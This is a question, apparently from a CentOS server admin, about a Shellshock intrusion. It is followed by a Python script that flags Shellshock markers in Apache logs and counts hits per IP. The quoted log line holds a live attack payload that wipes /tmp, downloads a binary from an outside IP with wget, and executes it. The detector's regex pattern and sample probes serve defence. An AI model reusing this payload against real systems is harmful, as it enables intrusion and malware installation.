
Weird hacking attempt in apache log

I am using CentOS 6.5 with apache 2.2.15. I found some weird attempts in the apache log file. After some digging I came to know that it was the shellshock vulnerability, so I checked the /tmp directory for the file China.Z-nnzz and it was present in /tmp.

I've immediately deleted this file and killed process running with the same name as well as updated bash to fix this vulnerability.

APACHE LOG

222.186.56.34 - - [14/Nov/2014:19:26:46 -0600] "GET / HTTP/1.1" 500 631 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://175.45.192.231:81/sshdd -O /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://175.45.192.231:81/sshdd -O /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

Then I checked the server status monitor and found that > 3000 GB of bandwidth (outgoing) has been used since this hacking attempt (within 6 days). Incoming data transfer is fine.


  1. Let's consider that the hacker downloaded all possible data from our server. But we have < 50 GB of data on the server, so how is 3000 GB of outgoing data possible?

  2. How to block such abusive web requests with apache? Is there any tool available that denies those attempts and sends a proactive alert to a specified email?
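The second question asks how to spot and act on requests like the one in the log above. The detection part is simple string matching: a Shellshock probe carries a bash function definition, `() { ... };`, in a header that Apache copies into an environment variable (here the Referer and User-Agent, both of which land in the combined log). The following script is an added example, not code from the question or its answers; it parses Apache combined-format lines, flags any line whose request, referer or user-agent carries that marker, and counts hits per source IP. The four log lines inside it are constructed for the demo (203.0.113.x addresses, a harmless `echo probe` payload); the only real signature is the `() {` prefix shown in the log above.

```python
import re
from collections import Counter

# Constructed sample Apache "combined" log lines for this demo (not real traffic).
# Line 2 and line 4 carry the Shellshock marker "() { ... };" in the Referer and
# User-Agent fields respectively; lines 1 and 3 are ordinary requests.
SAMPLE_LOG = r'''
203.0.113.10 - - [14/Nov/2014:19:26:46 -0600] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.11 - - [14/Nov/2014:19:27:01 -0600] "GET /cgi-bin/status HTTP/1.1" 500 631 "() { :; }; /bin/bash -c \"echo probe\"" "() { :; }; /bin/bash -c \"echo probe\""
203.0.113.12 - - [14/Nov/2014:19:27:05 -0600] "GET /index.html HTTP/1.1" 200 512 "http://example.com/" "curl/7.29.0"
203.0.113.11 - - [14/Nov/2014:19:28:10 -0600] "GET /cgi-bin/test.sh HTTP/1.1" 200 0 "-" "() { ignored; }; echo probe"
'''

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# The referer and user-agent groups accept backslash-escaped quotes, which is how
# Apache writes a double quote that appears inside a header value.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Shellshock marker: a bash function definition "() {" ... "}" followed by ";".
# Whitespace is optional because attackers vary it; the lazy ".*?" stops at the
# first closing brace so the match is the function body, not the whole payload.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{.*?\}\s*;')


def parse_line(line):
    """Split one combined-format line into its fields; return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def find_shellshock(log_text):
    """Return one record per log line whose request, referer or user-agent carries the marker."""
    hits = []
    for raw in log_text.strip().splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # unparseable line: skip, a real tool would count these separately
        for field in ("req", "referer", "ua"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    "ip": rec["ip"],
                    "ts": rec["ts"],
                    "status": rec["status"],
                    "field": field,       # first field the marker was found in
                    "payload": rec[field],
                })
                break
    return hits


def summarize(hits):
    """Count flagged requests per source IP, e.g. to feed a blocklist or an alert."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    # With a real file: find_shellshock(open("/var/log/httpd/access_log").read())
    found = find_shellshock(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} status={h["status"]} via {h["field"]}: {h["payload"][:60]}')
    for ip, n in summarize(found).most_common():
        print(f"{ip}: {n} shellshock request(s)")
```

On CentOS the combined log is normally /var/log/httpd/access_log. Note that the HTTP status on its own does not say whether the payload ran: the request in the question's log returned 500, yet the file in /tmp was still dropped, so every flagged line deserves a look regardless of status. The same `() {` match is what a web application firewall or a `RewriteCond %{HTTP_USER_AGENT}` style rule would test to reject the request before a CGI handler ever sees it, and `summarize()` gives the per-IP counts a cron job could turn into an e-mail alert.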